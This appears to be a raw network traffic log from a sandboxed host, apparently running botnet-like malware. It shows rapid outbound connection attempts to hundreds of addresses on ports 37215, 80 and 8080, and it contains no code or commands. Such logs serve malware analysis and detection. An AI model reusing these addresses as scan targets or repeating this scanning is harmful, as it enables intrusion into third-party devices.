Feb 14, 2024 09:28:47.297071934 CET	8096	37215	192.168.2.15	197.139.137.59
Feb 14, 2024 09:28:47.297097921 CET	8096	37215	192.168.2.15	197.132.66.165
Feb 14, 2024 09:28:47.297113895 CET	8096	37215	192.168.2.15	197.76.63.2
Feb 14, 2024 09:28:47.297128916 CET	8096	37215	192.168.2.15	197.0.26.77
Feb 14, 2024 09:28:47.297148943 CET	8096	37215	192.168.2.15	197.16.14.29
Feb 14, 2024 09:28:47.297178030 CET	8096	37215	192.168.2.15	197.21.59.42
Feb 14, 2024 09:28:47.297200918 CET	8096	37215	192.168.2.15	197.5.35.240
Feb 14, 2024 09:28:47.297200918 CET	8096	37215	192.168.2.15	197.81.166.95
Feb 14, 2024 09:28:47.297219992 CET	8096	37215	192.168.2.15	197.37.25.10
Feb 14, 2024 09:28:47.297243118 CET	8096	37215	192.168.2.15	197.19.27.215
Feb 14, 2024 09:28:47.297272921 CET	8096	37215	192.168.2.15	197.232.35.77
Feb 14, 2024 09:28:47.297290087 CET	8096	37215	192.168.2.15	197.242.91.212
Feb 14, 2024 09:28:47.297303915 CET	8096	37215	192.168.2.15	197.204.102.109
Feb 14, 2024 09:28:47.297358990 CET	8096	37215	192.168.2.15	197.45.231.182
Feb 14, 2024 09:28:47.297377110 CET	8096	37215	192.168.2.15	197.221.58.92
Feb 14, 2024 09:28:47.297377110 CET	8096	37215	192.168.2.15	197.40.117.170
Feb 14, 2024 09:28:47.297382116 CET	8096	37215	192.168.2.15	197.14.189.192
Feb 14, 2024 09:28:47.297400951 CET	8096	37215	192.168.2.15	197.36.82.171
Feb 14, 2024 09:28:47.297427893 CET	8096	37215	192.168.2.15	197.69.7.69
Feb 14, 2024 09:28:47.297450066 CET	8096	37215	192.168.2.15	197.142.10.123
Feb 14, 2024 09:28:47.297471046 CET	8096	37215	192.168.2.15	197.247.144.38
Feb 14, 2024 09:28:47.297487974 CET	8096	37215	192.168.2.15	197.121.101.229
Feb 14, 2024 09:28:47.297507048 CET	8096	37215	192.168.2.15	197.100.60.92
Feb 14, 2024 09:28:47.297538996 CET	8096	37215	192.168.2.15	197.3.131.190
Feb 14, 2024 09:28:47.297549963 CET	8096	37215	192.168.2.15	197.90.231.65
Feb 14, 2024 09:28:47.297585964 CET	8096	37215	192.168.2.15	197.135.125.38
Feb 14, 2024 09:28:47.297605038 CET	8096	37215	192.168.2.15	197.114.56.116
Feb 14, 2024 09:28:47.297629118 CET	8096	37215	192.168.2.15	197.185.91.64
Feb 14, 2024 09:28:47.297652006 CET	8096	37215	192.168.2.15	197.155.100.74
Feb 14, 2024 09:28:47.297665119 CET	8096	37215	192.168.2.15	197.189.193.247
Feb 14, 2024 09:28:47.297697067 CET	8096	37215	192.168.2.15	197.134.49.140
Feb 14, 2024 09:28:47.297715902 CET	8096	37215	192.168.2.15	197.52.47.128
Feb 14, 2024 09:28:47.297764063 CET	8096	37215	192.168.2.15	197.33.121.141
Feb 14, 2024 09:28:47.297786951 CET	8096	37215	192.168.2.15	197.37.155.45
Feb 14, 2024 09:28:47.297789097 CET	8096	37215	192.168.2.15	197.161.51.210
Feb 14, 2024 09:28:47.297815084 CET	8096	37215	192.168.2.15	197.164.1.77
Feb 14, 2024 09:28:47.297852993 CET	8096	37215	192.168.2.15	197.149.102.24
Feb 14, 2024 09:28:47.297854900 CET	8096	37215	192.168.2.15	197.115.233.22
Feb 14, 2024 09:28:47.297875881 CET	8096	37215	192.168.2.15	197.64.166.152
Feb 14, 2024 09:28:47.297900915 CET	8096	37215	192.168.2.15	197.55.15.190
Feb 14, 2024 09:28:47.297920942 CET	8096	37215	192.168.2.15	197.69.60.83
Feb 14, 2024 09:28:47.297935963 CET	8096	37215	192.168.2.15	197.250.30.50
Feb 14, 2024 09:28:47.297959089 CET	8096	37215	192.168.2.15	197.209.20.213
Feb 14, 2024 09:28:47.297981977 CET	8096	37215	192.168.2.15	197.2.83.159
Feb 14, 2024 09:28:47.298015118 CET	8096	37215	192.168.2.15	197.157.131.8
Feb 14, 2024 09:28:47.298015118 CET	8096	37215	192.168.2.15	197.206.233.149
Feb 14, 2024 09:28:47.298036098 CET	8096	37215	192.168.2.15	197.177.218.184
Feb 14, 2024 09:28:47.298058033 CET	8096	37215	192.168.2.15	197.149.97.147
Feb 14, 2024 09:28:47.298075914 CET	8096	37215	192.168.2.15	197.79.173.126
Feb 14, 2024 09:28:47.298110008 CET	8096	37215	192.168.2.15	197.224.80.168
Feb 14, 2024 09:28:47.298114061 CET	8096	37215	192.168.2.15	197.25.115.27
Feb 14, 2024 09:28:47.298126936 CET	8096	37215	192.168.2.15	197.75.155.19
Feb 14, 2024 09:28:47.298149109 CET	8096	37215	192.168.2.15	197.57.159.37
Feb 14, 2024 09:28:47.298177958 CET	8096	37215	192.168.2.15	197.215.65.140
Feb 14, 2024 09:28:47.298183918 CET	8096	37215	192.168.2.15	197.184.137.230
Feb 14, 2024 09:28:47.298226118 CET	8096	37215	192.168.2.15	197.71.108.230
Feb 14, 2024 09:28:47.298250914 CET	8096	37215	192.168.2.15	197.111.238.24
Feb 14, 2024 09:28:47.298254013 CET	8096	37215	192.168.2.15	197.176.175.109
Feb 14, 2024 09:28:47.298288107 CET	8096	37215	192.168.2.15	197.223.204.194
Feb 14, 2024 09:28:47.298346996 CET	8096	37215	192.168.2.15	197.173.98.225
Feb 14, 2024 09:28:47.298352003 CET	8096	37215	192.168.2.15	197.250.32.40
Feb 14, 2024 09:28:47.298378944 CET	8096	37215	192.168.2.15	197.209.227.77
Feb 14, 2024 09:28:47.298391104 CET	8096	37215	192.168.2.15	197.76.78.167
Feb 14, 2024 09:28:47.298408985 CET	8096	37215	192.168.2.15	197.225.53.187
Feb 14, 2024 09:28:47.298453093 CET	8096	37215	192.168.2.15	197.136.30.224
Feb 14, 2024 09:28:47.298453093 CET	8096	37215	192.168.2.15	197.54.16.175
Feb 14, 2024 09:28:47.298470020 CET	8096	37215	192.168.2.15	197.213.56.220
Feb 14, 2024 09:28:47.298491001 CET	8096	37215	192.168.2.15	197.4.200.146
Feb 14, 2024 09:28:47.298512936 CET	8096	37215	192.168.2.15	197.199.188.209
Feb 14, 2024 09:28:47.298531055 CET	8096	37215	192.168.2.15	197.39.37.136
Feb 14, 2024 09:28:47.298563957 CET	8096	37215	192.168.2.15	197.33.62.89
Feb 14, 2024 09:28:47.298578024 CET	8096	37215	192.168.2.15	197.108.247.165
Feb 14, 2024 09:28:47.298609972 CET	8096	37215	192.168.2.15	197.144.67.241
Feb 14, 2024 09:28:47.301918030 CET	80	7840	95.47.167.65	192.168.2.15
Feb 14, 2024 09:28:47.301975012 CET	7840	80	192.168.2.15	95.47.167.65
Feb 14, 2024 09:28:47.304445028 CET	80	7840	95.165.139.210	192.168.2.15
Feb 14, 2024 09:28:47.304621935 CET	7840	80	192.168.2.15	95.165.139.210
Feb 14, 2024 09:28:47.308998108 CET	80	7840	95.111.97.91	192.168.2.15
Feb 14, 2024 09:28:47.310995102 CET	80	7840	95.175.2.194	192.168.2.15
Feb 14, 2024 09:28:47.320142984 CET	80	7840	95.71.124.249	192.168.2.15
Feb 14, 2024 09:28:47.329725027 CET	80	7840	95.215.242.21	192.168.2.15
Feb 14, 2024 09:28:47.330091000 CET	7840	80	192.168.2.15	95.215.242.21
Feb 14, 2024 09:28:47.331059933 CET	80	7840	95.86.78.146	192.168.2.15
Feb 14, 2024 09:28:47.331121922 CET	7840	80	192.168.2.15	95.86.78.146
Feb 14, 2024 09:28:47.357120037 CET	80	7840	95.69.17.221	192.168.2.15
Feb 14, 2024 09:28:47.357928991 CET	80	60060	112.175.243.56	192.168.2.15
Feb 14, 2024 09:28:47.359303951 CET	80	60060	112.175.243.56	192.168.2.15
Feb 14, 2024 09:28:47.359402895 CET	60060	80	192.168.2.15	112.175.243.56
Feb 14, 2024 09:28:47.361922026 CET	80	7840	95.209.129.238	192.168.2.15
Feb 14, 2024 09:28:47.362072945 CET	80	60068	112.175.243.56	192.168.2.15
Feb 14, 2024 09:28:47.362149954 CET	7840	80	192.168.2.15	95.209.129.238
Feb 14, 2024 09:28:47.362159967 CET	60068	80	192.168.2.15	112.175.243.56
Feb 14, 2024 09:28:47.362215996 CET	60068	80	192.168.2.15	112.175.243.56
Feb 14, 2024 09:28:47.362282991 CET	60120	80	192.168.2.15	95.101.201.148
Feb 14, 2024 09:28:47.362298012 CET	45086	80	192.168.2.15	95.100.127.15
Feb 14, 2024 09:28:47.362313032 CET	52484	80	192.168.2.15	95.47.167.65
Feb 14, 2024 09:28:47.362328053 CET	60806	80	192.168.2.15	95.165.139.210
Feb 14, 2024 09:28:47.362346888 CET	52620	80	192.168.2.15	95.215.242.21
Feb 14, 2024 09:28:47.362391949 CET	57528	80	192.168.2.15	95.209.129.238
Feb 14, 2024 09:28:47.362459898 CET	54268	80	192.168.2.15	95.86.78.146
Feb 14, 2024 09:28:47.366678953 CET	80	35190	112.180.15.84	192.168.2.15
Feb 14, 2024 09:28:47.366687059 CET	80	35190	112.180.15.84	192.168.2.15
Feb 14, 2024 09:28:47.366718054 CET	80	35190	112.180.15.84	192.168.2.15
Feb 14, 2024 09:28:47.366724014 CET	80	35190	112.180.15.84	192.168.2.15
Feb 14, 2024 09:28:47.366774082 CET	35190	80	192.168.2.15	112.180.15.84
Feb 14, 2024 09:28:47.366790056 CET	35190	80	192.168.2.15	112.180.15.84
Feb 14, 2024 09:28:47.366790056 CET	35190	80	192.168.2.15	112.180.15.84
Feb 14, 2024 09:28:47.370084047 CET	80	35198	112.180.15.84	192.168.2.15
Feb 14, 2024 09:28:47.370187998 CET	35198	80	192.168.2.15	112.180.15.84
Feb 14, 2024 09:28:47.370187998 CET	35198	80	192.168.2.15	112.180.15.84
Feb 14, 2024 09:28:47.382615089 CET	80	7840	95.58.76.157	192.168.2.15
Feb 14, 2024 09:28:47.382774115 CET	7840	80	192.168.2.15	95.58.76.157
Feb 14, 2024 09:28:47.383688927 CET	80	7840	95.111.218.63	192.168.2.15
Feb 14, 2024 09:28:47.383738041 CET	7840	80	192.168.2.15	95.111.218.63
Feb 14, 2024 09:28:47.390746117 CET	80	33820	112.223.39.29	192.168.2.15
Feb 14, 2024 09:28:47.390799046 CET	33820	80	192.168.2.15	112.223.39.29
Feb 14, 2024 09:28:47.390822887 CET	33820	80	192.168.2.15	112.223.39.29
Feb 14, 2024 09:28:47.390844107 CET	36418	80	192.168.2.15	95.58.76.157
Feb 14, 2024 09:28:47.390868902 CET	34790	80	192.168.2.15	95.111.218.63
Feb 14, 2024 09:28:47.391442060 CET	6752	8080	192.168.2.15	62.39.174.234
Feb 14, 2024 09:28:47.391452074 CET	6752	8080	192.168.2.15	94.189.105.94
Feb 14, 2024 09:28:47.391457081 CET	6752	8080	192.168.2.15	95.93.70.180
Feb 14, 2024 09:28:47.391477108 CET	6752	8080	192.168.2.15	94.66.70.70
Feb 14, 2024 09:28:47.391478062 CET	6752	8080	192.168.2.15	31.159.212.217
Feb 14, 2024 09:28:47.391505003 CET	6752	8080	192.168.2.15	62.109.8.123
Feb 14, 2024 09:28:47.391514063 CET	6752	8080	192.168.2.15	94.85.36.144
Feb 14, 2024 09:28:47.391527891 CET	6752	8080	192.168.2.15	62.213.207.221
Feb 14, 2024 09:28:47.391529083 CET	6752	8080	192.168.2.15	95.123.155.89
Feb 14, 2024 09:28:47.391545057 CET	6752	8080	192.168.2.15	95.85.177.80
Feb 14, 2024 09:28:47.391547918 CET	6752	8080	192.168.2.15	94.96.41.169
Feb 14, 2024 09:28:47.391549110 CET	6752	8080	192.168.2.15	85.108.238.99
Feb 14, 2024 09:28:47.391566038 CET	6752	8080	192.168.2.15	85.191.111.156
Feb 14, 2024 09:28:47.391577959 CET	6752	8080	192.168.2.15	31.5.96.238
Feb 14, 2024 09:28:47.391581059 CET	6752	8080	192.168.2.15	95.105.119.83
Feb 14, 2024 09:28:47.391582012 CET	6752	8080	192.168.2.15	95.133.137.36
Feb 14, 2024 09:28:47.391602993 CET	6752	8080	192.168.2.15	94.136.95.49
Feb 14, 2024 09:28:47.391608953 CET	6752	8080	192.168.2.15	62.96.37.123
Feb 14, 2024 09:28:47.391608953 CET	6752	8080	192.168.2.15	85.20.24.204
Feb 14, 2024 09:28:47.391643047 CET	6752	8080	192.168.2.15	94.52.205.243
Feb 14, 2024 09:28:47.391654015 CET	6752	8080	192.168.2.15	31.230.117.57
Feb 14, 2024 09:28:47.391680002 CET	6752	8080	192.168.2.15	94.80.124.86
Feb 14, 2024 09:28:47.391680002 CET	6752	8080	192.168.2.15	94.208.102.251
Feb 14, 2024 09:28:47.391683102 CET	6752	8080	192.168.2.15	31.109.244.238
Feb 14, 2024 09:28:47.391684055 CET	6752	8080	192.168.2.15	94.244.25.212
Feb 14, 2024 09:28:47.391700983 CET	6752	8080	192.168.2.15	94.183.205.9
Feb 14, 2024 09:28:47.391719103 CET	6752	8080	192.168.2.15	85.5.140.227
Feb 14, 2024 09:28:47.391727924 CET	6752	8080	192.168.2.15	94.23.65.108
Feb 14, 2024 09:28:47.391747952 CET	6752	8080	192.168.2.15	95.2.192.221
Feb 14, 2024 09:28:47.391769886 CET	6752	8080	192.168.2.15	62.107.130.139
Feb 14, 2024 09:28:47.391787052 CET	6752	8080	192.168.2.15	62.231.79.247
Feb 14, 2024 09:28:47.391794920 CET	6752	8080	192.168.2.15	85.166.126.9
Feb 14, 2024 09:28:47.391797066 CET	6752	8080	192.168.2.15	85.183.186.156
Feb 14, 2024 09:28:47.391823053 CET	6752	8080	192.168.2.15	95.41.175.26
Feb 14, 2024 09:28:47.391825914 CET	6752	8080	192.168.2.15	85.128.119.70
Feb 14, 2024 09:28:47.391850948 CET	6752	8080	192.168.2.15	85.71.205.38
Feb 14, 2024 09:28:47.391853094 CET	6752	8080	192.168.2.15	62.183.176.2
Feb 14, 2024 09:28:47.391870975 CET	6752	8080	192.168.2.15	31.227.133.100
Feb 14, 2024 09:28:47.391884089 CET	6752	8080	192.168.2.15	62.201.89.192
Feb 14, 2024 09:28:47.391911030 CET	6752	8080	192.168.2.15	85.81.100.105
Feb 14, 2024 09:28:47.391912937 CET	6752	8080	192.168.2.15	95.23.131.155
Feb 14, 2024 09:28:47.391916037 CET	6752	8080	192.168.2.15	85.71.91.98
Feb 14, 2024 09:28:47.391916037 CET	6752	8080	192.168.2.15	31.171.148.128
Feb 14, 2024 09:28:47.391927958 CET	6752	8080	192.168.2.15	95.54.198.125
Feb 14, 2024 09:28:47.391932964 CET	6752	8080	192.168.2.15	31.133.254.83
Feb 14, 2024 09:28:47.391933918 CET	6752	8080	192.168.2.15	31.64.229.174
Feb 14, 2024 09:28:47.391948938 CET	6752	8080	192.168.2.15	94.166.76.135
Feb 14, 2024 09:28:47.391957045 CET	6752	8080	192.168.2.15	62.146.253.105
Feb 14, 2024 09:28:47.391963959 CET	6752	8080	192.168.2.15	94.27.140.153
Feb 14, 2024 09:28:47.391963959 CET	6752	8080	192.168.2.15	85.191.99.51
Feb 14, 2024 09:28:47.391977072 CET	6752	8080	192.168.2.15	62.111.199.47
Feb 14, 2024 09:28:47.391982079 CET	6752	8080	192.168.2.15	85.60.167.240
Feb 14, 2024 09:28:47.391983032 CET	6752	8080	192.168.2.15	95.90.254.228
Feb 14, 2024 09:28:47.391987085 CET	6752	8080	192.168.2.15	62.223.183.118
Feb 14, 2024 09:28:47.391989946 CET	6752	8080	192.168.2.15	85.161.190.179
Feb 14, 2024 09:28:47.391999960 CET	6752	8080	192.168.2.15	62.42.254.3
Feb 14, 2024 09:28:47.392004013 CET	6752	8080	192.168.2.15	95.83.247.253
Feb 14, 2024 09:28:47.392009020 CET	6752	8080	192.168.2.15	94.77.14.174
Feb 14, 2024 09:28:47.392024040 CET	6752	8080	192.168.2.15	85.144.12.205
Feb 14, 2024 09:28:47.392024994 CET	6752	8080	192.168.2.15	95.31.249.19
Feb 14, 2024 09:28:47.392025948 CET	6752	8080	192.168.2.15	31.13.76.160
Feb 14, 2024 09:28:47.392030954 CET	6752	8080	192.168.2.15	94.226.21.199
Feb 14, 2024 09:28:47.392035961 CET	6752	8080	192.168.2.15	31.207.92.94
Feb 14, 2024 09:28:47.392049074 CET	6752	8080	192.168.2.15	94.0.114.191
Feb 14, 2024 09:28:47.392050982 CET	6752	8080	192.168.2.15	95.81.246.153
Feb 14, 2024 09:28:47.392052889 CET	6752	8080	192.168.2.15	31.199.44.224
Feb 14, 2024 09:28:47.392054081 CET	6752	8080	192.168.2.15	95.244.161.121
Feb 14, 2024 09:28:47.392060041 CET	6752	8080	192.168.2.15	95.47.82.34
Feb 14, 2024 09:28:47.392071009 CET	6752	8080	192.168.2.15	94.152.240.68
Feb 14, 2024 09:28:47.392071962 CET	6752	8080	192.168.2.15	94.21.84.205
Feb 14, 2024 09:28:47.392075062 CET	6752	8080	192.168.2.15	31.228.239.226
Feb 14, 2024 09:28:47.392091036 CET	6752	8080	192.168.2.15	94.146.163.77
Feb 14, 2024 09:28:47.392091036 CET	6752	8080	192.168.2.15	95.84.196.146
Feb 14, 2024 09:28:47.392093897 CET	6752	8080	192.168.2.15	31.150.196.90
Feb 14, 2024 09:28:47.392103910 CET	6752	8080	192.168.2.15	31.212.107.174
Feb 14, 2024 09:28:47.392106056 CET	6752	8080	192.168.2.15	94.103.217.96
Feb 14, 2024 09:28:47.392117977 CET	6752	8080	192.168.2.15	31.194.91.160
Feb 14, 2024 09:28:47.392122984 CET	6752	8080	192.168.2.15	85.92.242.134
Feb 14, 2024 09:28:47.392138004 CET	6752	8080	192.168.2.15	62.5.15.189
Feb 14, 2024 09:28:47.392144918 CET	6752	8080	192.168.2.15	95.222.117.217
Feb 14, 2024 09:28:47.392146111 CET	6752	8080	192.168.2.15	31.95.164.82
Feb 14, 2024 09:28:47.392149925 CET	6752	8080	192.168.2.15	85.137.146.46
Feb 14, 2024 09:28:47.392164946 CET	6752	8080	192.168.2.15	62.116.13.92
Feb 14, 2024 09:28:47.392164946 CET	6752	8080	192.168.2.15	95.199.65.105
Feb 14, 2024 09:28:47.392165899 CET	6752	8080	192.168.2.15	85.68.40.127
Feb 14, 2024 09:28:47.392165899 CET	6752	8080	192.168.2.15	85.123.133.160
Feb 14, 2024 09:28:47.392168999 CET	6752	8080	192.168.2.15	31.93.199.229
Feb 14, 2024 09:28:47.392170906 CET	6752	8080	192.168.2.15	31.4.85.6
Feb 14, 2024 09:28:47.392174006 CET	6752	8080	192.168.2.15	95.36.14.167
Feb 14, 2024 09:28:47.392185926 CET	6752	8080	192.168.2.15	62.100.85.57
Feb 14, 2024 09:28:47.392194033 CET	6752	8080	192.168.2.15	94.17.147.118
Feb 14, 2024 09:28:47.392199039 CET	6752	8080	192.168.2.15	31.55.206.203
Feb 14, 2024 09:28:47.392205000 CET	6752	8080	192.168.2.15	95.136.188.157
Feb 14, 2024 09:28:47.392214060 CET	6752	8080	192.168.2.15	94.226.201.170
Feb 14, 2024 09:28:47.392216921 CET	6752	8080	192.168.2.15	62.22.43.84
Feb 14, 2024 09:28:47.392218113 CET	6752	8080	192.168.2.15	85.235.58.42
Feb 14, 2024 09:28:47.392220974 CET	6752	8080	192.168.2.15	85.177.59.239
Feb 14, 2024 09:28:47.392239094 CET	6752	8080	192.168.2.15	85.175.107.29
Feb 14, 2024 09:28:47.392239094 CET	6752	8080	192.168.2.15	62.91.24.175
Feb 14, 2024 09:28:47.392239094 CET	6752	8080	192.168.2.15	62.139.181.159
Feb 14, 2024 09:28:47.392244101 CET	6752	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:47.392250061 CET	6752	8080	192.168.2.15	62.81.24.204
Feb 14, 2024 09:28:47.392251968 CET	6752	8080	192.168.2.15	31.185.224.5
Feb 14, 2024 09:28:47.392255068 CET	6752	8080	192.168.2.15	85.210.49.225
Feb 14, 2024 09:28:47.392260075 CET	6752	8080	192.168.2.15	95.55.44.243
Feb 14, 2024 09:28:47.392265081 CET	6752	8080	192.168.2.15	95.21.216.160
Feb 14, 2024 09:28:47.392275095 CET	6752	8080	192.168.2.15	94.130.2.227
Feb 14, 2024 09:28:47.392276049 CET	6752	8080	192.168.2.15	31.205.90.106
Feb 14, 2024 09:28:47.392277956 CET	6752	8080	192.168.2.15	31.79.222.49
Feb 14, 2024 09:28:47.392291069 CET	6752	8080	192.168.2.15	31.0.152.202
Feb 14, 2024 09:28:47.392292023 CET	6752	8080	192.168.2.15	94.40.130.68
Feb 14, 2024 09:28:47.392294884 CET	6752	8080	192.168.2.15	31.48.32.176
Feb 14, 2024 09:28:47.392306089 CET	6752	8080	192.168.2.15	85.67.106.125
Feb 14, 2024 09:28:47.392318964 CET	6752	8080	192.168.2.15	95.142.97.14
Feb 14, 2024 09:28:47.392319918 CET	6752	8080	192.168.2.15	62.68.99.190
Feb 14, 2024 09:28:47.392319918 CET	6752	8080	192.168.2.15	62.127.164.172
Feb 14, 2024 09:28:47.392324924 CET	6752	8080	192.168.2.15	95.47.24.22
Feb 14, 2024 09:28:47.392324924 CET	6752	8080	192.168.2.15	95.103.172.4
Feb 14, 2024 09:28:47.392338991 CET	6752	8080	192.168.2.15	31.124.60.201
Feb 14, 2024 09:28:47.392348051 CET	6752	8080	192.168.2.15	62.51.243.107
Feb 14, 2024 09:28:47.392349005 CET	6752	8080	192.168.2.15	62.28.172.40
Feb 14, 2024 09:28:47.392358065 CET	6752	8080	192.168.2.15	85.56.217.1
Feb 14, 2024 09:28:47.392370939 CET	6752	8080	192.168.2.15	31.4.1.147
Feb 14, 2024 09:28:47.392371893 CET	6752	8080	192.168.2.15	85.6.89.46
Feb 14, 2024 09:28:47.392379045 CET	6752	8080	192.168.2.15	62.154.75.147
Feb 14, 2024 09:28:47.392383099 CET	6752	8080	192.168.2.15	94.60.9.214
Feb 14, 2024 09:28:47.392393112 CET	6752	8080	192.168.2.15	95.196.175.70
Feb 14, 2024 09:28:47.392394066 CET	6752	8080	192.168.2.15	85.1.12.52
Feb 14, 2024 09:28:47.392398119 CET	6752	8080	192.168.2.15	95.141.17.7
Feb 14, 2024 09:28:47.392398119 CET	6752	8080	192.168.2.15	62.229.129.91
Feb 14, 2024 09:28:47.392410040 CET	6752	8080	192.168.2.15	31.117.75.30
Feb 14, 2024 09:28:47.392416000 CET	6752	8080	192.168.2.15	94.45.143.135
Feb 14, 2024 09:28:47.392416000 CET	6752	8080	192.168.2.15	94.102.194.14
Feb 14, 2024 09:28:47.392430067 CET	6752	8080	192.168.2.15	85.15.125.210
Feb 14, 2024 09:28:47.392440081 CET	6752	8080	192.168.2.15	85.27.146.179
Feb 14, 2024 09:28:47.392443895 CET	6752	8080	192.168.2.15	85.141.69.245
Feb 14, 2024 09:28:47.392460108 CET	6752	8080	192.168.2.15	85.234.36.146
Feb 14, 2024 09:28:47.392462969 CET	6752	8080	192.168.2.15	85.33.1.234
Feb 14, 2024 09:28:47.392466068 CET	6752	8080	192.168.2.15	62.190.198.25
Feb 14, 2024 09:28:47.392468929 CET	6752	8080	192.168.2.15	85.10.92.103
Feb 14, 2024 09:28:47.392472982 CET	6752	8080	192.168.2.15	95.231.80.188
Feb 14, 2024 09:28:47.392477036 CET	6752	8080	192.168.2.15	62.123.218.210
Feb 14, 2024 09:28:47.392479897 CET	6752	8080	192.168.2.15	85.130.192.7
Feb 14, 2024 09:28:47.392481089 CET	6752	8080	192.168.2.15	94.150.147.125
Feb 14, 2024 09:28:47.392487049 CET	6752	8080	192.168.2.15	31.231.66.235
Feb 14, 2024 09:28:47.392505884 CET	6752	8080	192.168.2.15	31.61.31.248
Feb 14, 2024 09:28:47.392517090 CET	6752	8080	192.168.2.15	31.169.34.224
Feb 14, 2024 09:28:47.392518997 CET	6752	8080	192.168.2.15	62.194.199.10
Feb 14, 2024 09:28:47.392528057 CET	6752	8080	192.168.2.15	94.105.28.223
Feb 14, 2024 09:28:47.392535925 CET	6752	8080	192.168.2.15	62.219.71.117
Feb 14, 2024 09:28:47.392539978 CET	6752	8080	192.168.2.15	85.96.100.101
Feb 14, 2024 09:28:47.392553091 CET	6752	8080	192.168.2.15	62.77.99.31
Feb 14, 2024 09:28:47.392558098 CET	6752	8080	192.168.2.15	94.138.138.237
Feb 14, 2024 09:28:47.392558098 CET	6752	8080	192.168.2.15	95.180.132.152
Feb 14, 2024 09:28:47.392570019 CET	6752	8080	192.168.2.15	94.152.70.111
Feb 14, 2024 09:28:47.392571926 CET	6752	8080	192.168.2.15	31.5.218.213
Feb 14, 2024 09:28:47.392581940 CET	6752	8080	192.168.2.15	31.222.49.109
Feb 14, 2024 09:28:47.392586946 CET	6752	8080	192.168.2.15	95.56.239.231
Feb 14, 2024 09:28:47.392591000 CET	6752	8080	192.168.2.15	95.107.245.159
Feb 14, 2024 09:28:47.392606974 CET	6752	8080	192.168.2.15	94.159.244.213
Feb 14, 2024 09:28:47.392607927 CET	6752	8080	192.168.2.15	31.190.46.225
Feb 14, 2024 09:28:47.392610073 CET	6752	8080	192.168.2.15	31.90.208.123
Feb 14, 2024 09:28:47.392611980 CET	6752	8080	192.168.2.15	85.133.209.83
Feb 14, 2024 09:28:47.392611980 CET	6752	8080	192.168.2.15	31.58.54.153
Feb 14, 2024 09:28:47.392616987 CET	6752	8080	192.168.2.15	62.212.157.41
Feb 14, 2024 09:28:47.392627001 CET	6752	8080	192.168.2.15	95.26.238.140
Feb 14, 2024 09:28:47.392631054 CET	6752	8080	192.168.2.15	62.227.40.61
Feb 14, 2024 09:28:47.392642021 CET	6752	8080	192.168.2.15	95.62.12.64
Feb 14, 2024 09:28:47.392646074 CET	6752	8080	192.168.2.15	85.210.146.121
Feb 14, 2024 09:28:47.392654896 CET	6752	8080	192.168.2.15	95.179.161.153
Feb 14, 2024 09:28:47.392689943 CET	6752	8080	192.168.2.15	31.96.155.187
Feb 14, 2024 09:28:47.392695904 CET	6752	8080	192.168.2.15	31.90.160.108
Feb 14, 2024 09:28:47.392703056 CET	6752	8080	192.168.2.15	31.81.158.255
Feb 14, 2024 09:28:47.392708063 CET	6752	8080	192.168.2.15	94.112.102.49
Feb 14, 2024 09:28:47.392709017 CET	6752	8080	192.168.2.15	62.99.166.188
Feb 14, 2024 09:28:47.392724037 CET	6752	8080	192.168.2.15	85.13.222.90
Feb 14, 2024 09:28:47.392725945 CET	6752	8080	192.168.2.15	31.155.116.246
Feb 14, 2024 09:28:47.392725945 CET	6752	8080	192.168.2.15	94.13.181.224
Feb 14, 2024 09:28:47.392735004 CET	6752	8080	192.168.2.15	31.150.189.217
Feb 14, 2024 09:28:47.392746925 CET	6752	8080	192.168.2.15	85.59.47.158
Feb 14, 2024 09:28:47.392749071 CET	6752	8080	192.168.2.15	62.110.69.13
Feb 14, 2024 09:28:47.392749071 CET	6752	8080	192.168.2.15	62.168.95.3
Feb 14, 2024 09:28:47.392750978 CET	6752	8080	192.168.2.15	95.223.87.163
Feb 14, 2024 09:28:47.392752886 CET	6752	8080	192.168.2.15	95.126.194.245
Feb 14, 2024 09:28:47.392766953 CET	6752	8080	192.168.2.15	31.249.182.48
Feb 14, 2024 09:28:47.392771959 CET	6752	8080	192.168.2.15	95.204.228.191
Feb 14, 2024 09:28:47.392781019 CET	6752	8080	192.168.2.15	94.93.45.79
Feb 14, 2024 09:28:47.392790079 CET	6752	8080	192.168.2.15	85.253.107.0
Feb 14, 2024 09:28:47.392791986 CET	6752	8080	192.168.2.15	31.132.209.128
Feb 14, 2024 09:28:47.392802000 CET	6752	8080	192.168.2.15	94.50.112.3
Feb 14, 2024 09:28:47.392811060 CET	6752	8080	192.168.2.15	95.249.41.219
Feb 14, 2024 09:28:47.392812967 CET	6752	8080	192.168.2.15	85.49.227.255
Feb 14, 2024 09:28:47.392813921 CET	6752	8080	192.168.2.15	31.68.142.165
Feb 14, 2024 09:28:47.392822027 CET	6752	8080	192.168.2.15	31.166.97.24
Feb 14, 2024 09:28:47.392836094 CET	6752	8080	192.168.2.15	62.9.164.165
Feb 14, 2024 09:28:47.392841101 CET	6752	8080	192.168.2.15	62.233.17.128
Feb 14, 2024 09:28:47.392851114 CET	6752	8080	192.168.2.15	94.225.255.131
Feb 14, 2024 09:28:47.392852068 CET	6752	8080	192.168.2.15	94.15.222.106
Feb 14, 2024 09:28:47.392859936 CET	6752	8080	192.168.2.15	85.44.13.199
Feb 14, 2024 09:28:47.392862082 CET	6752	8080	192.168.2.15	62.230.195.123
Feb 14, 2024 09:28:47.392874002 CET	6752	8080	192.168.2.15	62.84.138.46
Feb 14, 2024 09:28:47.392877102 CET	6752	8080	192.168.2.15	94.69.151.4
Feb 14, 2024 09:28:47.392877102 CET	6752	8080	192.168.2.15	95.208.160.118
Feb 14, 2024 09:28:47.392890930 CET	6752	8080	192.168.2.15	62.147.3.76
Feb 14, 2024 09:28:47.392891884 CET	6752	8080	192.168.2.15	94.115.236.153
Feb 14, 2024 09:28:47.392894983 CET	6752	8080	192.168.2.15	95.44.237.30
Feb 14, 2024 09:28:47.392908096 CET	6752	8080	192.168.2.15	85.43.172.67
Feb 14, 2024 09:28:47.392916918 CET	6752	8080	192.168.2.15	62.192.155.185
Feb 14, 2024 09:28:47.392916918 CET	6752	8080	192.168.2.15	95.236.175.210
Feb 14, 2024 09:28:47.392930031 CET	6752	8080	192.168.2.15	62.125.176.124
Feb 14, 2024 09:28:47.392936945 CET	6752	8080	192.168.2.15	94.68.123.232
Feb 14, 2024 09:28:47.392946959 CET	6752	8080	192.168.2.15	85.85.204.41
Feb 14, 2024 09:28:47.392947912 CET	6752	8080	192.168.2.15	31.20.195.221
Feb 14, 2024 09:28:47.392947912 CET	6752	8080	192.168.2.15	95.28.17.188
Feb 14, 2024 09:28:47.392947912 CET	6752	8080	192.168.2.15	85.73.71.70
